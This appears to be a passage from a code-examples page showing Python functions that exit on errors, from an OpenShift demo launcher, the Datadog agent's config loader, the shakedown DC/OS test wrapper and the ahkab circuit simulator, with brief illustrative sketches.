  # If cleaning up, this is ok
  if not cleanup:
    if skip_subscription_management and not use_certificate_repos:
      click.echo('Cannot skip subscription management without using certificate repos.')
      sys.exit(1)

  # If using subscription management, cannot use certificate repos
  if not skip_subscription_management and use_certificate_repos:
    click.echo('Must skip subscription management when using certificate repos')
    sys.exit(1)

  # Prompt for RHSM user and password if not skipping subscription management
  if not skip_subscription_management:
    # If the user already provided values, don't bother asking again
    if rhsm_user is None:
      rhsm_user = click.prompt("RHSM username?")
    if rhsm_pass is None:
      rhsm_pass = click.prompt("RHSM password?", hide_input=True, confirmation_prompt=True)

  # User must supply a repo URL if using certificate repos
  if use_certificate_repos and aos_repo is None:
    click.echo('Must provide a repo URL via --aos-repo when using certificate repos')
    sys.exit(1)

  # User must supply kerberos user and token with --prerelease
  if prerelease and ( kerberos_user is None or kerberos_token is None ):
    click.echo('Must provide --kerberos-user / --kerberos-token with --prerelease')
    sys.exit(1)

  # Override hexboard size calculation
  if hexboard_size is None:
    if num_nodes <= 1:
      hexboard_size = 'tiny'
    elif num_nodes < 3:
      hexboard_size = 'xsmall'
    elif num_nodes < 5:
      hexboard_size = 'small'
    elif num_nodes < 9:
      hexboard_size = 'medium'
    elif num_nodes < 15:
      hexboard_size = 'large'
    else:
      hexboard_size = 'xlarge'

  # Calculate various DNS values
  host_zone="%s.%s" % (cluster_id, r53_zone)
  wildcard_zone="%s.%s.%s" % (app_dns_prefix, cluster_id, r53_zone)

  # Display information to the user about their choices
  click.echo('Configured values:')
  click.echo('\tcluster_id: %s' % cluster_id)
  click.echo('\tami: %s' % ami)
  click.echo('\tregion: %s' % region)
  click.echo('\tmaster instance_type: %s' % master_instance_type)
  click.echo('\tnode_instance_type: %s' % node_instance_type)
  click.echo('\tinfra_instance_type: %s' % infra_instance_type)
  click.echo('\tkeypair: %s' % keypair)
  click.echo('\tnodes: %s' % num_nodes)
  click.echo('\tinfra nodes: %s' % num_infra)
  click.echo('\tmasters: %s' % num_masters)
  click.echo('\tconsole port: %s' % console_port)
  click.echo('\tapi port: %s' % api_port)
  click.echo('\tdeployment_type: %s' % deployment_type)
  click.echo('\tpackage_version: %s' % package_version)

  if use_certificate_repos:
    click.echo('\taos_repo: %s' % aos_repo)

  click.echo('\tprerelease: %s' % prerelease)

  if prerelease:
    click.echo('\tkerberos user: %s' % kerberos_user)
    click.echo('\tkerberos token: %s' % kerberos_token)

  click.echo('\tregistry_url: %s' % registry_url)
  click.echo('\thexboard_size: %s' % hexboard_size)
  click.echo('\tr53_zone: %s' % r53_zone)
  click.echo('\tapp_dns_prefix: %s' % app_dns_prefix)
  click.echo('\thost dns: %s' % host_zone)
  click.echo('\tapps dns: %s' % wildcard_zone)

  # Don't bother to display subscription manager values if we're skipping subscription management
  if not skip_subscription_management:
    click.echo('\trhsm_user: %s' % rhsm_user)
    click.echo('\trhsm_pass: *******')

  if run_smoke_tests or run_only_smoke_tests:
    click.echo('\tnum smoke users: %s' % num_smoke_test_users)

  click.echo('\tdefault password: %s' % default_password)

  click.echo("")

  if run_only_smoke_tests:
    click.echo('Only smoke tests will be run.')

  if debug_playbook:
    click.echo('We will debug the following playbook: %s' % (debug_playbook))

  if not no_confirm and not cleanup:
    click.confirm('Continue using these values?', abort=True)

  # Special confirmations for cleanup
  if cleanup:
    click.confirm('Delete the cluster %s' % cluster_id, abort=True)
    click.confirm('ARE YOU REALLY SURE YOU WANT TO DELETE THE CLUSTER %s' % cluster_id, abort=True)
    click.confirm('Press enter to continue', abort=True, default=True)

  playbooks = []

  if debug_playbook:
    playbooks = [debug_playbook]
  elif run_only_smoke_tests:
    playbooks = ['playbooks/projects_setup.yml']
  elif cleanup:
    playbooks = ['playbooks/cleanup.yml']
  else:

    # start with the basic setup
    playbooks = ['playbooks/cloudformation_setup.yml']

    # if cert repos, then add that playbook
    if use_certificate_repos:
      playbooks.append('playbooks/certificate_repos.yml')

    # if not cert repos, add the register hosts playbook
    if not use_certificate_repos:
      playbooks.append('playbooks/register_hosts.yml')
    
    # add the setup and projects playbooks
    playbooks.append('playbooks/openshift_setup.yml')
    playbooks.append('playbooks/projects_setup.yml')

  for playbook in playbooks:

    # hide cache output unless in verbose mode
    devnull='> /dev/null'

    if verbose > 0:
      devnull=''

    # refresh the inventory cache to prevent stale hosts from
    # interfering with re-running
    command='inventory/aws/hosts/ec2.py --refresh-cache %s' % (devnull)
    os.system(command)

    # remove any cached facts to prevent stale data during a re-run
    command='rm -rf .ansible/cached_facts'
    os.system(command)

    command='ansible-playbook -i inventory/aws/hosts -e \'cluster_id=%s \
    ec2_region=%s \
    ec2_image=%s \
    ec2_keypair=%s \
    ec2_master_instance_type=%s \
    ec2_infra_instance_type=%s \
    ec2_node_instance_type=%s \
    r53_zone=%s \
    r53_host_zone=%s \
    r53_wildcard_zone=%s \
    console_port=%s \
    api_port=%s \
    num_app_nodes=%s \
    num_infra_nodes=%s \
    num_masters=%s \
    hexboard_size=%s \
    deployment_type=%s \
    package_version=-%s \
    rhsm_user=%s \
    rhsm_pass=%s \
    skip_subscription_management=%s \
    use_certificate_repos=%s \
    aos_repo=%s \
    prerelease=%s \
    kerberos_user=%s \
    kerberos_token=%s \
    registry_url=%s \
    run_smoke_tests=%s \
    run_only_smoke_tests=%s \
    num_smoke_test_users=%s \
    default_password=%s\' %s' % (cluster_id,
                    region,
                    ami,
                    keypair,
                    master_instance_type,
                    infra_instance_type,
                    node_instance_type,
                    r53_zone,
                    host_zone,
                    wildcard_zone,
                    console_port,
                    api_port,
                    num_nodes,
                    num_infra,
                    num_masters,
                    hexboard_size,
                    deployment_type,
                    package_version,
                    rhsm_user,
                    rhsm_pass,
                    skip_subscription_management,
                    use_certificate_repos,
                    aos_repo,
                    prerelease,
                    kerberos_user,
                    kerberos_token,
                    registry_url,
                    run_smoke_tests,
                    run_only_smoke_tests,
                    num_smoke_test_users,
                    default_password,
                    playbook)

    if verbose > 0:
      command += " -" + "".join(['v']*verbose)
      click.echo('We are running: %s' % command)

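    # os.system() returns a raw wait status, not a plain exit code;
    # os.WIFEXITED() checks that the command terminated normally and
    # os.WEXITSTATUS() extracts its exit code from that status.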
    status = os.system(command)
    if os.WIFEXITED(status) and os.WEXITSTATUS(status) != 0:
      return os.WEXITSTATUS(status)

  # if the last run playbook didn't explode, assume cluster provisioned successfully
  # but make sure that user was not just running tests or cleaning up
  if os.WIFEXITED(status) and os.WEXITSTATUS(status) == 0:
    if not debug_playbook and not run_only_smoke_tests and not cleanup:
      click.echo('Your cluster provisioned successfully. The console is available at https://openshift.%s:%s' % (host_zone, console_port))
      click.echo('You can SSH into a master using the same SSH key with: ssh -i /path/to/key.pem [email protected]%s' % (host_zone))
      click.echo('**After logging into the OpenShift console** you will need to visit https://metrics.%s and accept the Hawkular SSL certificate' % ( wildcard_zone ))
      click.echo('You can access Kibana at https://kibana.%s' % ( wildcard_zone ))

    if cleanup:
      click.echo('Your cluster, %s, was de-provisioned and removed successfully.' % (cluster_id))
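
The option handling at the top of launch_demo_env follows a common click pattern: validate the combination of flags as early as possible and bail out with click.echo plus sys.exit(1) when the request is unsafe or incomplete. A stripped-down, hypothetical command (not part of demo-ansible) showing just that check:

import sys

import click


@click.command()
@click.option('--cleanup', is_flag=True, help='Deletes environment')
@click.option('--no-confirm', is_flag=True, help='Skip confirmation prompt')
def launch(cleanup, no_confirm):
    # Refuse unsafe flag combinations up front, mirroring the checks above.
    if cleanup and no_confirm:
        click.echo('Cannot use --cleanup and --no-confirm as it is not safe.')
        sys.exit(1)
    click.echo('Configured values look sane, proceeding...')


if __name__ == '__main__':
    launch()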

Example 32

Project: dd-agent
Source File: config.py
View license
def get_config(parse_args=True, cfg_path=None, options=None):
    if parse_args:
        options, _ = get_parsed_args()

    # General config
    agentConfig = {
        'check_freq': DEFAULT_CHECK_FREQUENCY,
        'dogstatsd_port': 8125,
        'dogstatsd_target': 'http://localhost:17123',
        'graphite_listen_port': None,
        'hostname': None,
        'listen_port': None,
        'tags': None,
        'use_ec2_instance_id': False,  # DEPRECATED
        'version': get_version(),
        'watchdog': True,
        'additional_checksd': '/etc/dd-agent/checks.d/',
        'bind_host': get_default_bind_host(),
        'statsd_metric_namespace': None,
        'utf8_decoding': False
    }

    if Platform.is_mac():
        agentConfig['additional_checksd'] = '/opt/datadog-agent/etc/checks.d'

    # Config handling
    try:
        # Find the right config file
        path = os.path.realpath(__file__)
        path = os.path.dirname(path)

        config_path = get_config_path(cfg_path, os_name=get_os())
        config = ConfigParser.ConfigParser()
        config.readfp(skip_leading_wsp(open(config_path)))

        # bulk import
        for option in config.options('Main'):
            agentConfig[option] = config.get('Main', option)

        # Store developer mode setting in the agentConfig
        if config.has_option('Main', 'developer_mode'):
            agentConfig['developer_mode'] = _is_affirmative(config.get('Main', 'developer_mode'))

        # Allow an override with the --profile option
        if options is not None and options.profile:
            agentConfig['developer_mode'] = True

        #
        # Core config
        #
        if not config.has_option('Main', 'api_key'):
            log.warning(u"No API key was found. Aborting.")
            sys.exit(2)

        if not config.has_option('Main', 'dd_url'):
            log.warning(u"No dd_url was found. Aborting.")
            sys.exit(2)

        # Endpoints
        dd_urls = map(clean_dd_url, config.get('Main', 'dd_url').split(','))
        api_keys = map(lambda el: el.strip(), config.get('Main', 'api_key').split(','))

        # For collector and dogstatsd
        agentConfig['dd_url'] = dd_urls[0]
        agentConfig['api_key'] = api_keys[0]

        # Forwarder endpoints logic
        # endpoints is:
        # {
        #    'https://app.datadoghq.com': ['api_key_abc', 'api_key_def'],
        #    'https://app.example.com': ['api_key_xyz']
        # }
        endpoints = {}
        dd_urls = remove_empty(dd_urls)
        api_keys = remove_empty(api_keys)
        if len(dd_urls) == 1:
            if len(api_keys) > 0:
                endpoints[dd_urls[0]] = api_keys
        else:
            assert len(dd_urls) == len(api_keys), 'Please provide one api_key for each url'
            for i, dd_url in enumerate(dd_urls):
                endpoints[dd_url] = endpoints.get(dd_url, []) + [api_keys[i]]

        agentConfig['endpoints'] = endpoints

        # Forwarder or not forwarder
        agentConfig['use_forwarder'] = options is not None and options.use_forwarder
        if agentConfig['use_forwarder']:
            listen_port = 17123
            if config.has_option('Main', 'listen_port'):
                listen_port = int(config.get('Main', 'listen_port'))
            agentConfig['dd_url'] = "http://{}:{}".format(agentConfig['bind_host'], listen_port)
        # FIXME: Legacy dd_url command line switch
        elif options is not None and options.dd_url is not None:
            agentConfig['dd_url'] = options.dd_url

        # Forwarder timeout
        agentConfig['forwarder_timeout'] = 20
        if config.has_option('Main', 'forwarder_timeout'):
            agentConfig['forwarder_timeout'] = int(config.get('Main', 'forwarder_timeout'))


        # Extra checks.d path
        # the linux directory is set by default
        if config.has_option('Main', 'additional_checksd'):
            agentConfig['additional_checksd'] = config.get('Main', 'additional_checksd')
        elif get_os() == 'windows':
            # default windows location
            common_path = _windows_commondata_path()
            agentConfig['additional_checksd'] = os.path.join(common_path, 'Datadog', 'checks.d')

        if config.has_option('Main', 'use_dogstatsd'):
            agentConfig['use_dogstatsd'] = config.get('Main', 'use_dogstatsd').lower() in ("yes", "true")
        else:
            agentConfig['use_dogstatsd'] = True

        # Service discovery
        if config.has_option('Main', 'service_discovery_backend'):
            try:
                additional_config = extract_agent_config(config)
                agentConfig.update(additional_config)
            except:
                log.error('Failed to load the agent configuration related to '
                          'service discovery. It will not be used.')

        # Concerns only Windows
        if config.has_option('Main', 'use_web_info_page'):
            agentConfig['use_web_info_page'] = config.get('Main', 'use_web_info_page').lower() in ("yes", "true")
        else:
            agentConfig['use_web_info_page'] = True

        # local traffic only? Default to no
        agentConfig['non_local_traffic'] = False
        if config.has_option('Main', 'non_local_traffic'):
            agentConfig['non_local_traffic'] = config.get('Main', 'non_local_traffic').lower() in ("yes", "true")

        # DEPRECATED
        if config.has_option('Main', 'use_ec2_instance_id'):
            use_ec2_instance_id = config.get('Main', 'use_ec2_instance_id')
            # translate yes into True, the rest into False
            agentConfig['use_ec2_instance_id'] = (use_ec2_instance_id.lower() == 'yes')

        if config.has_option('Main', 'check_freq'):
            try:
                agentConfig['check_freq'] = int(config.get('Main', 'check_freq'))
            except Exception:
                pass

        # Custom histogram aggregate/percentile metrics
        if config.has_option('Main', 'histogram_aggregates'):
            agentConfig['histogram_aggregates'] = get_histogram_aggregates(config.get('Main', 'histogram_aggregates'))

        if config.has_option('Main', 'histogram_percentiles'):
            agentConfig['histogram_percentiles'] = get_histogram_percentiles(config.get('Main', 'histogram_percentiles'))

        # Disable Watchdog (optionally)
        if config.has_option('Main', 'watchdog'):
            if config.get('Main', 'watchdog').lower() in ('no', 'false'):
                agentConfig['watchdog'] = False

        # Optional graphite listener
        if config.has_option('Main', 'graphite_listen_port'):
            agentConfig['graphite_listen_port'] = \
                int(config.get('Main', 'graphite_listen_port'))
        else:
            agentConfig['graphite_listen_port'] = None

        # Dogstatsd config
        dogstatsd_defaults = {
            'dogstatsd_port': 8125,
            'dogstatsd_target': 'http://' + agentConfig['bind_host'] + ':17123',
        }
        for key, value in dogstatsd_defaults.iteritems():
            if config.has_option('Main', key):
                agentConfig[key] = config.get('Main', key)
            else:
                agentConfig[key] = value

        # Create app:xxx tags based on monitored apps
        agentConfig['create_dd_check_tags'] = config.has_option('Main', 'create_dd_check_tags') and \
            _is_affirmative(config.get('Main', 'create_dd_check_tags'))

        # Forwarding to external statsd server
        if config.has_option('Main', 'statsd_forward_host'):
            agentConfig['statsd_forward_host'] = config.get('Main', 'statsd_forward_host')
            if config.has_option('Main', 'statsd_forward_port'):
                agentConfig['statsd_forward_port'] = int(config.get('Main', 'statsd_forward_port'))

        # Optional config
        # FIXME not the prettiest code ever...
        if config.has_option('Main', 'use_mount'):
            agentConfig['use_mount'] = _is_affirmative(config.get('Main', 'use_mount'))

        if options is not None and options.autorestart:
            agentConfig['autorestart'] = True
        elif config.has_option('Main', 'autorestart'):
            agentConfig['autorestart'] = _is_affirmative(config.get('Main', 'autorestart'))

        if config.has_option('Main', 'check_timings'):
            agentConfig['check_timings'] = _is_affirmative(config.get('Main', 'check_timings'))

        if config.has_option('Main', 'exclude_process_args'):
            agentConfig['exclude_process_args'] = _is_affirmative(config.get('Main', 'exclude_process_args'))

        try:
            filter_device_re = config.get('Main', 'device_blacklist_re')
            agentConfig['device_blacklist_re'] = re.compile(filter_device_re)
        except ConfigParser.NoOptionError:
            pass

        # Dogstream config
        if config.has_option("Main", "dogstream_log"):
            # Older version, single log support
            log_path = config.get("Main", "dogstream_log")
            if config.has_option("Main", "dogstream_line_parser"):
                agentConfig["dogstreams"] = ':'.join([log_path, config.get("Main", "dogstream_line_parser")])
            else:
                agentConfig["dogstreams"] = log_path

        elif config.has_option("Main", "dogstreams"):
            agentConfig["dogstreams"] = config.get("Main", "dogstreams")

        if config.has_option("Main", "nagios_perf_cfg"):
            agentConfig["nagios_perf_cfg"] = config.get("Main", "nagios_perf_cfg")

        if config.has_option("Main", "use_curl_http_client"):
            agentConfig["use_curl_http_client"] = _is_affirmative(config.get("Main", "use_curl_http_client"))
        else:
            # Default to False as there are some issues with the curl client and ELB
            agentConfig["use_curl_http_client"] = False

        if config.has_section('WMI'):
            agentConfig['WMI'] = {}
            for key, value in config.items('WMI'):
                agentConfig['WMI'][key] = value

        if (config.has_option("Main", "limit_memory_consumption") and
                config.get("Main", "limit_memory_consumption") is not None):
            agentConfig["limit_memory_consumption"] = int(config.get("Main", "limit_memory_consumption"))
        else:
            agentConfig["limit_memory_consumption"] = None

        if config.has_option("Main", "skip_ssl_validation"):
            agentConfig["skip_ssl_validation"] = _is_affirmative(config.get("Main", "skip_ssl_validation"))

        agentConfig["collect_instance_metadata"] = True
        if config.has_option("Main", "collect_instance_metadata"):
            agentConfig["collect_instance_metadata"] = _is_affirmative(config.get("Main", "collect_instance_metadata"))

        agentConfig["proxy_forbid_method_switch"] = False
        if config.has_option("Main", "proxy_forbid_method_switch"):
            agentConfig["proxy_forbid_method_switch"] = _is_affirmative(config.get("Main", "proxy_forbid_method_switch"))

        agentConfig["collect_ec2_tags"] = False
        if config.has_option("Main", "collect_ec2_tags"):
            agentConfig["collect_ec2_tags"] = _is_affirmative(config.get("Main", "collect_ec2_tags"))

        agentConfig["utf8_decoding"] = False
        if config.has_option("Main", "utf8_decoding"):
            agentConfig["utf8_decoding"] = _is_affirmative(config.get("Main", "utf8_decoding"))

        agentConfig["gce_updated_hostname"] = False
        if config.has_option("Main", "gce_updated_hostname"):
            agentConfig["gce_updated_hostname"] = _is_affirmative(config.get("Main", "gce_updated_hostname"))

    except ConfigParser.NoSectionError as e:
        sys.stderr.write('Config file not found or incorrectly formatted.\n')
        sys.exit(2)

    except ConfigParser.ParsingError as e:
        sys.stderr.write('Config file not found or incorrectly formatted.\n')
        sys.exit(2)

    except ConfigParser.NoOptionError as e:
        sys.stderr.write('There are some items missing from your config file, but nothing fatal [%s]' % e)

    # Storing proxy settings in the agentConfig
    agentConfig['proxy_settings'] = get_proxy(agentConfig)
    if agentConfig.get('ca_certs', None) is None:
        agentConfig['ssl_certificate'] = get_ssl_certificate(get_os(), 'datadog-cert.pem')
    else:
        agentConfig['ssl_certificate'] = agentConfig['ca_certs']

    return agentConfig
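
get_config() treats a missing api_key, a missing dd_url, or an unreadable/unparsable config file as fatal and aborts with sys.exit(2). A minimal sketch of that shape follows; the agent.cfg path and the reduced option list are made up for the demo, and the dual import keeps it runnable on Python 2 (ConfigParser, as in the code above) and Python 3 (configparser).

import sys

try:
    import configparser                  # Python 3
except ImportError:
    import ConfigParser as configparser  # Python 2, as used above


def load_config(path='agent.cfg'):
    config = configparser.ConfigParser()
    try:
        read_ok = config.read(path)
    except configparser.Error:
        read_ok = []
    if not read_ok:
        sys.stderr.write('Config file not found or incorrectly formatted.\n')
        sys.exit(2)
    for option in ('api_key', 'dd_url'):
        if not config.has_option('Main', option):
            sys.stderr.write('No %s was found. Aborting.\n' % option)
            sys.exit(2)  # non-zero status signals the fatal configuration error
    return dict(config.items('Main'))


if __name__ == '__main__':
    print(load_config())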

Example 33

Project: shakedown
Source File: main.py
View license
@click.command('shakedown')
@click.argument('tests', nargs=-1)
@click.option('-u', '--dcos-url', help='URL to a running DC/OS cluster.')
@click.option('-f', '--fail', type=click.Choice(['fast', 'never']), default='never', help='Specify whether to continue testing when encountering failures. (default: never)')
@click.option('-i', '--ssh-key-file', type=click.Path(), help='Path to the SSH keyfile to use for authentication.')
@click.option('-q', '--quiet', is_flag=True, help='Suppress all superfluous output.')
@click.option('-k', '--ssl-no-verify', is_flag=True, help='Suppress SSL certificate verification.')
@click.option('-o', '--stdout', type=click.Choice(['pass', 'fail', 'skip', 'all', 'none']), help='Print the standard output of tests with the specified result. (default: fail)')
@click.option('-s', '--stdout-inline', is_flag=True, help='Display output inline rather than after test phase completion.')
@click.option('-p', '--pytest-option', multiple=True, help='Options flags to pass to pytest.')
@click.option('-t', '--oauth-token', help='OAuth token to use for DC/OS authentication.')
@click.option('-n', '--username', help='Username to use for DC/OS authentication.')
@click.option('-w', '--password', hide_input=True, help='Password to use for DC/OS authentication.')
@click.option('--no-banner', is_flag=True, help='Suppress the product banner.')
@click.version_option(version=shakedown.VERSION)


def cli(**args):
    """ Shakedown is a DC/OS test-harness wrapper for the pytest tool.
    """
    import shakedown

    # Read configuration options from ~/.shakedown (if exists)
    args = read_config(args)

    # Set configuration defaults
    args = set_config_defaults(args)

    if args['quiet']:
        shakedown.cli.quiet = True

    if not args['dcos_url']:
        args['dcos_url'] = dcos_url()

    if not args['dcos_url']:
        click.secho('error: --dcos-url is a required option; see --help for more information.', fg='red', bold=True)
        sys.exit(1)

    if args['ssh_key_file']:
        shakedown.cli.ssh_key_file = args['ssh_key_file']

    if not args['no_banner']:
        echo(banner(), n=False)

    echo('Running pre-flight checks...', d='step-maj')

    # required modules and their 'version' method
    imported = {}
    requirements = {
        'pytest': '__version__',
        'dcos': 'version'
    }

    for req in requirements:
        ver = requirements[req]

        echo("Checking for {} library...".format(req), d='step-min', n=False)
        try:
            imported[req] = importlib.import_module(req, package=None)
        except ImportError:
            click.secho("error: {p} is not installed; run 'pip install {p}'.".format(p=req), fg='red', bold=True)
            sys.exit(1)

        echo(getattr(imported[req], requirements[req]))

    if args['ssl_no_verify']:
        imported['dcos'].config.set_val('core.ssl_verify', 'False')

    echo('Checking for DC/OS cluster...', d='step-min', n=False)

    with stdchannel_redirected(sys.stderr, os.devnull):
        imported['dcos'].config.set_val('core.dcos_url', args['dcos_url'])

    try:
        echo(shakedown.dcos_version())
    except:
        click.secho("error: cluster '" + args['dcos_url'] + "' is unreachable.", fg='red', bold=True)
        sys.exit(1)

    echo('Authenticating with cluster...', d='step-maj')
    authenticated = False
    token = imported['dcos'].config.get_config_val("core.dcos_acs_token")
    if token is not None:
        echo('Validating existing ACS token...', d='step-min', n=False)
        try:
            shakedown.dcos_leader()

            echo('ok')
            authenticated = True
        except imported['dcos'].errors.DCOSException:
            click.secho("error: authentication failed.", fg='red', bold=True)
    if not authenticated and args['oauth_token']:
        try:
            echo('Validating OAuth token...', d='step-min', n=False)
            token = shakedown.authenticate_oauth(args['oauth_token'])

            with stdchannel_redirected(sys.stderr, os.devnull):
                imported['dcos'].config.set_val('core.dcos_acs_token', token)

            authenticated = True
            echo('ok')
        except:
            click.secho("error: authentication failed.", fg='red', bold=True)
    if not authenticated and args['username'] and args['password']:
        try:
            echo('Validating username and password...', d='step-min', n=False)
            token = shakedown.authenticate(args['username'], args['password'])

            with stdchannel_redirected(sys.stderr, os.devnull):
                imported['dcos'].config.set_val('core.dcos_acs_token', token)

            authenticated = True
            echo('ok')
        except:
            click.secho("error: authentication failed.", fg='red', bold=True)
    if not authenticated:
        click.secho("error: no authentication credentials or token found.", fg='red', bold=True)
        sys.exit(1)

    class shakedown:
        """ This encapsulates a PyTest wrapper plugin
        """

        state = {}

        stdout = []

        tests = {
            'file': {},
            'test': {}
        }

        report_stats = {
            'passed':[],
            'skipped':[],
            'failed':[],
            'total_passed':0,
            'total_skipped':0,
            'total_failed':0,
        }


        def output(title, state, text, status=True):
            """ Capture and display stdout/stderr output

                :param title: the title of the output box (eg. test name)
                :type title: str
                :param state: state of the result (pass, fail)
                :type state: str
                :param text: the stdout/stderr output
                :type text: str
                :param status: whether to output a status marker
                :type status: bool
            """
            if state == 'fail':
                schr = fchr('FF')
            elif state == 'pass':
                schr = fchr('PP')

            if status:
                if not args['stdout_inline']:
                    if state == 'fail':
                        echo(schr, d='fail')
                    elif state == 'pass':
                        echo(schr, d='pass')
                else:
                    if not text:
                        if state == 'fail':
                            echo(schr, d='fail')
                        elif state == 'pass':
                            echo(schr, d='pass')

            if text and args['stdout'] in [state, 'all']:
                o = decorate(schr + ': ', 'quote-head-' + state)
                o += click.style(decorate(title, style=state), bold=True) + "\n"
                o += decorate(str(text).strip(), style='quote-' + state)

                if args['stdout_inline']:
                    echo(o)
                else:
                    shakedown.stdout.append(o)


        def pytest_collectreport(self, report):
            """ Collect and validate individual test files
            """

            if not 'collect' in shakedown.state:
                shakedown.state['collect'] = 1
                echo('Collecting and validating test files...', d='step-min')

            if report.nodeid:
                echo(report.nodeid, d='item-maj', n=False)

                state = None

                if report.failed:
                    state = 'fail'
                if report.passed:
                    state = 'pass'
                if report.skipped:
                    state = 'skip'

                if state:
                    if report.longrepr:
                        shakedown.output(report.nodeid, state, report.longrepr)
                    else:
                        shakedown.output(report.nodeid, state, None)


        def pytest_sessionstart(self):
            """ Tests have been collected, begin running them...
            """

            echo('Initiating testing phase...', d='step-maj')


        def pytest_report_teststatus(self, report):
            """ Print report results to the console as they are run
            """

            try:
                report_file, report_test = report.nodeid.split('::', 1)
            except ValueError:
                return

            if not 'test' in shakedown.state:
                shakedown.state['test'] = 1
                echo('Running individual tests...', d='step-min')

            if not report_file in shakedown.tests['file']:
                shakedown.tests['file'][report_file] = 1
                if args['stdout_inline']:
                    echo('')
                echo(report_file, d='item-maj')
            if not report.nodeid in shakedown.tests['test']:
                shakedown.tests['test'][report.nodeid] = {}
                if args['stdout_inline']:
                    echo('')
                echo(report_test, d='item-min', n=False)

            if report.failed:
                shakedown.tests['test'][report.nodeid]['fail'] = True

            if report.when == 'teardown' and not 'tested' in shakedown.tests['test'][report.nodeid]:
                shakedown.output(report.nodeid, 'pass', None)

            # Suppress excess terminal output
            return report.outcome, None, None


        def pytest_runtest_logreport(self, report):
            """ Log the [stdout, stderr] results of tests if desired
            """

            state = None

            for secname, content in report.sections:
                if report.failed:
                    state = 'fail'
                if report.passed:
                    state = 'pass'
                if report.skipped:
                    state = 'skip'

                if state and secname != 'Captured stdout call':
                    module = report.nodeid.split('::', 1)[0]
                    cap_type = secname.split(' ')[-1]

                    if not 'setup' in shakedown.tests['test'][report.nodeid]:
                        shakedown.tests['test'][report.nodeid]['setup'] = True
                        shakedown.output(module + ' ' + cap_type, state, content, False)
                    elif cap_type == 'teardown':
                        shakedown.output(module + ' ' + cap_type, state, content, False)
                elif state and report.when == 'call':
                    if 'tested' in shakedown.tests['test'][report.nodeid]:
                        shakedown.output(report.nodeid, state, content, False)
                    else:
                        shakedown.tests['test'][report.nodeid]['tested'] = True
                        shakedown.output(report.nodeid, state, content)

            # Capture execution crashes
            if hasattr(report.longrepr, 'reprcrash'):
                longreport = report.longrepr

                if 'tested' in shakedown.tests['test'][report.nodeid]:
                    shakedown.output(report.nodeid, 'fail', 'error: ' + str(longreport.reprcrash), False)

                    if args['stdout_inline']:
                        echo('')
                else:
                    shakedown.tests['test'][report.nodeid]['tested'] = True
                    shakedown.output(report.nodeid, 'fail', 'error: ' + str(longreport.reprcrash))


        def pytest_sessionfinish(self, session, exitstatus):
            """ Testing phase is complete; print extra reports (stdout/stderr, JSON) as requested
            """

            echo('Test phase completed.', d='step-maj')

            if ('stdout' in args and args['stdout']) and shakedown.stdout:
                for output in shakedown.stdout:
                    echo(output)

    opts = ['-q', '--tb=no']

    if args['fail'] == 'fast':
        opts.append('-x')

    if args['pytest_option']:
        for opt in args['pytest_option']:
            opts.append(opt)

    if args['tests']:
        tests_to_run = []
        for test in args['tests']:
            tests_to_run.extend(test.split())
        for test in tests_to_run:
            opts.append(test)

    exitstatus = imported['pytest'].main(opts, plugins=[shakedown()])

    sys.exit(exitstatus)
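
The example above reduces to a common pattern: assemble a pytest option list, run pytest.main() with a custom plugin, and hand the integer exit status straight to sys.exit so the shell (or a CI job) sees the test outcome. Below is a minimal sketch of just that pattern, without the shakedown plugin; the helper name run_tests is illustrative and not part of the project.

import sys

import pytest


def run_tests(extra_opts=None):
    # Quiet output and no tracebacks, mirroring the options built above.
    opts = ['-q', '--tb=no']
    if extra_opts:
        opts.extend(extra_opts)
    # pytest.main() returns an integer exit status (0 means all tests passed).
    exitstatus = pytest.main(opts)
    # Propagate it so shell scripts and CI can react to failures.
    sys.exit(exitstatus)


if __name__ == '__main__':
    run_tests(sys.argv[1:])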

Example 34

Project: ahkab
Source File: transient.py
View license
def transient_analysis(circ, tstart, tstep, tstop, method=options.default_tran_method, use_step_control=True, x0=None,
                       mna=None, N=None, D=None, outfile="stdout", return_req_dict=None, verbose=3):
    """Performs a transient analysis of the circuit described by circ.

    Parameters:
    circ: circuit instance to be simulated.
    tstart: start value. Better leave this to zero.
    tstep: the maximum step to be allowed during simulation.
    tstop: stop value for simulation
    method: differentiation method: 'TRAP' (default) or 'IMPLICIT_EULER' or 'GEARx' with x=1..6
    use_step_control: the LTE will be calculated and the step adjusted. default: True
    x0: the starting point, the solution at t=tstart (defaults to None, will be set to the OP)
    mna, N, D: MNA matrices, defaulting to None, for big circuits, reusing matrices saves time
    outfile: filename, the results will be written to this file. "stdout" means print out.
    return_req_dict:  to be documented
    verbose: verbosity level from 0 (silent) to 6 (very verbose).

    """
    if outfile == "stdout":
        verbose = 0
    _debug = False
    if options.transient_no_step_control:
        use_step_control = False
    if _debug:
        print_step_and_lte = True
    else:
        print_step_and_lte = False

    method = method.upper() if method is not None else options.default_tran_method
    HMAX = tstep

    #check parameters
    if tstart > tstop:
        printing.print_general_error("tstart > tstop")
        sys.exit(1)
    if tstep < 0:
        printing.print_general_error("tstep < 0")
        sys.exit(1)

    if verbose > 4:
        tmpstr = "Vea = %g Ver = %g Iea = %g Ier = %g max_time_iter = %g HMIN = %g" % \
        (options.vea, options.ver, options.iea, options.ier, options.transient_max_time_iter, options.hmin)
        printing.print_info_line((tmpstr, 5), verbose)

    locked_nodes = circ.get_locked_nodes()

    if print_step_and_lte:
        flte = open("step_and_lte.graph", "w")
        flte.write("#T\tStep\tLTE\n")

    printing.print_info_line(("Starting transient analysis: ", 3), verbose)
    printing.print_info_line(("Selected method: %s" % (method,), 3), verbose)
    #It's a good idea to call transient with prebuilt MNA and N matrix
    #the analysis will be slightly faster (long netlists).
    if mna is None or N is None:
        (mna, N) = dc_analysis.generate_mna_and_N(circ, verbose=verbose)
        mna = utilities.remove_row_and_col(mna)
        N = utilities.remove_row(N, rrow=0)
    elif not mna.shape[0] == N.shape[0]:
        printing.print_general_error("mna matrix and N vector have different number of rows.")
        sys.exit(0)
    if D is None:
        # if you do more than one tran analysis, output streams should be changed...
        # this needs to be fixed
        D = generate_D(circ, (mna.shape[0], mna.shape[0]))
        D = utilities.remove_row_and_col(D)

    # setup x0
    if x0 is None:
        printing.print_info_line(("Generating x(t=%g) = 0" % (tstart,), 5), verbose)
        x0 = np.zeros((mna.shape[0], 1))
        opsol =  results.op_solution(x=x0, error=x0, circ=circ, outfile=None)
    else:
        if isinstance(x0, results.op_solution):
            opsol = x0
            x0 = x0.asarray()
        else:
            opsol =  results.op_solution(x=x0, error=np.zeros((mna.shape[0], 1)), circ=circ, outfile=None)
        printing.print_info_line(("Using the supplied op as x(t=%g)." % (tstart,), 5), verbose)

    if verbose > 4:
        print("x0:")
        opsol.print_short()

